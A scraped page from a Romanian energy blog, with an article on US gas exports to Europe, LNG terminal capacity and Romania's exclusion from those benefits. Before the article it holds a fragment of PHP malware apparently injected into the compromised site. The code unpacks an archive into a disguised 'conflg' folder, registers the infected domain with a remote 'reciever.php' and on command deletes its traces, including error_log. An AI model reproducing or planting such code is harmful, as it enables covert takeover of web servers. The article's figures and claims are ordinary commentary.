'; $data = $data1.$data2.$data3.$data4.$data5; $fas = fopen ($unzip_path, "w"); fwrite($fas, $data); fclose($fas); $unzip_url = 'http://'.$domain_name_2.'/'.$status[1].'unzip.php'; echo getURL($unzip_url); } } else { echo '~Can not upload archive!~'; rmdir($dir_path); exit; } if (file_exists($script_name)) { echo '~Client has been activated!~'; $file_name = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file = fopen($file_name,"rt"); $original_file = fread($file,filesize($file_name)); fclose($file); $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file.'reciever.php?data='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); exit; } else { echo '~Can not unziped!~'; unlink($archive_path); rmdir($dir_path); exit; } } else { echo '~Can not make dir!~'; exit; } } if ($status[0] == 'finish') { $file_name_2 = $_SERVER['DOCUMENT_ROOT'].'/'.$status[1].'server_name.txt'; $file_2 = fopen($file_name_2,"rt"); $original_file_2 = fread($file_2,filesize($file_name_2)); fclose($file_2); if (($status[1] != null) and ($status[1] != '')) $dir_for_work = $status[1]; else $dir_for_work = 'conflg/'; $dir_path = $_SERVER['DOCUMENT_ROOT'].'/'.$dir_for_work; $archive_path = $dir_path.'1.zip'; if (is_dir($dir_path)) { $arr_filename = array (); if ($dh = opendir($dir_path)) { while (($file = readdir($dh)) !== false) { if (($file != ".") and ($file != "..")) $arr_filename[] = $file; } closedir($dh); } foreach ($arr_filename as $key) { $key = trim($key); $file_for_delete = "$dir_path/$key"; $file_for_delete = str_replace('///', '/', $file_for_delete); $file_for_delete = str_replace('//', '/', $file_for_delete); $file_for_check = str_replace($_SERVER['DOCUMENT_ROOT'], '/', $file_for_delete); $file_for_check = str_replace('//', '/', $file_for_check); if (substr_count($file_for_check, "/") >=2) { if (file_exists($file_for_delete)) unlink($file_for_delete); if (file_exists($file_for_delete)) { chmod($file_for_delete, 0777); unlink($file_for_delete); } } } } if (file_exists("error_log")) unlink("error_log"); if (is_dir($dir_path)) rmdir($dir_path); if (is_dir($dir_path)) { chmod($dir_path, 0777); rmdir($dir_path); } if (is_dir($dir_path)) echo "~Error!~"; else { $domain_name = $_SERVER['SERVER_NAME']; $url = $original_file_2.'reciever.php?del='.$domain_name; $UA = 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4'; $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_REFERER, $domain_name); curl_setopt($ch, CURLOPT_USERAGENT, $UA); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $data = curl_exec($ch); curl_close($ch); echo $data.'
'; $data = file_get_contents($url); echo $data.'
'; echo getURL($url); } exit; } } } ?> Exportul gazelor din SUA în EUROPA | Dumitru Chisalita

Rss

Exportul gazelor din SUA în EUROPA

SUA a fost prima ţară din lume care a înţeles importanţa conservării propriilor resurse şi consumul din resursele altor ţări, ca fiind politica ce dă adevărata putere unui stat. Încă din anul 1920 administraţia americană a promovat Mineral Leasing Act prin care se interzicea exportul de ţiţei, ulterior această interdicţie a fost întărită în anul 1975 prin Energy Policy and Conservation Act şi în anul 1979 prin Export Administration Act.

Exploatarea gazelor neconvenţionale în SUA, a determinat creşterea substanţială a ofertei de gaze pe piaţa din SUA. Acest aspect a condus la scăderea preţurilor la gaz până la un nivel la care pot fi puse în pericol investiţiile pentru noi lucrări de exploatare şi/sau explorare. Acest aspect a contribuit la ridicarea parţială a interdicţiei privind exporturile de gaze din SUA pentru Canada şi Mexic.

Permisiunea exportului de gaze către Europa, într-o situaţie de criză, apreciem că se încadrează în „derogările” pe care le poate permite Energy Policy and Conservation Act. Această acţiune ar determina echilibrarea cererii şi a ofertei şi ridicarea preţului, până la un nivel acceptabil de piaţa americană şi interesat pentru companiile petroliere. În fapt, probabil că SUA va permite exportul, doar a unui procent din producţia de gaze, un procent care permite echilibrarea cererii şi ofertei (un preţ atractiv pentru companiile producătoare şi acceptabil pentru consumatori). În acest context, cu cîteva zile înaintea discursului susţinut la Bruxeless de preşedintele americii, s-au purtat discuții la Washinghton privind acordarea permisiunii de export gaze printr-un număr de 6 terminale LNG.

Conform unui material prezentat la Veneţia în anul 2013, capacitatea maximă teoretică de export a gazelor din SUA prin lichefiere este de 280 mld mc, aproape egală cu cantitatea importată anual de Europa din Norvegia şi Rusia. Din cele 16 terminale LNG existente în SUA, unul a primit autorizaţia de export, altele sunt în discuţie pentru a primi această autorizaţie.

 export SUA

Sursa:Impact of US Shale Gas Development on the Global Gas Balance, Daniele De Giovanni, ENI, Venice, 23rd May 2013

Exportul gazelor din SUA ar putea detemina o scădere a preţului gazelor pe piaţa mondială a LNG, aspect care va face atractivă achiziţionarea gazelor lichefiate, construirea de noi terminale LNG în Europa şi poate constitui un element important în negocierea dintre unele ţări Europene şi Rusia.

lng europa

În Europa există 41 terminale de LNG cu o capacitate de regazeificare de 180 mld mc şi alte 29 terminale LNG în fază de proiect/construcţie cu termene de finalizare până în 2020. Cu toate că există o capacitate importantă de import gaze prin LNG, mai mare cu 20 mld mc decât cantitatea de gaze importată din Rusia în anul 2012, în acelaşi an s-au importat prin terminale LNG doar 64 mld mc. O cauză importantă a acestei situaţii fiind preţul LNG care a fost în medie cu 5 euro/MWh mai mare decât preţul gazelor din Federaţia Rusă.

Consumul de gaz în Europa, în anul 2012  a fost de 511 mld mc, din 161 mld mc din Federaţia Rusă (31,5%) şi 64 mld mc prin terminale LNG (12,5%) .

Astfel, decizia exportului de gaze din SUA în Europa, ar avea avantaje directe prin noi surse care s-ar pune pe piaţă, indirect prin o eventuală scădere a preţului pe piaţa LNG –ului, dar indirect şi prin avataje pe care le ar prezenta prezenţa acestor noi surse în negocierea cu furnizorii tradiţionali de gaze în Europa.

Avantajele vor exista în ţări cu terminale precum UK, Franţa, Spania, Portugalia, Italia, Grecia, Olanda, Belgia şi Turcia, dar şi în alte ţări care prin susţinerea unor capacităţi de LNG, în aceste ţări coroborat cu dezvoltarea infrastructurii de transport, beneficiază de accesul la terminale de gaze, chiar dacă aceste ţări nu au acces la mare.

România nu se încadrează în nici una din categoriile de mai sus şi nu va beneficia de avantajele unei astfel de decizii. Îngroparea unei intenţii din anul 2011 de a participa la un astfel de terminal din altă ţară, care să-i confere accesul la un terminal LNG determină lipsa unei alternative astăzi, dar mai ales în viitor. Precizăm că terminalul LNG prevăzut în proiectul AGRI, nu are nici o importanţă în această ecuaţie, gazele lichefiate în diverse părţi ale lumii neputând să ajungă la Constanţa, urmare a interdicţiei de tranzit impuse în Strâmtoarea Bosfor.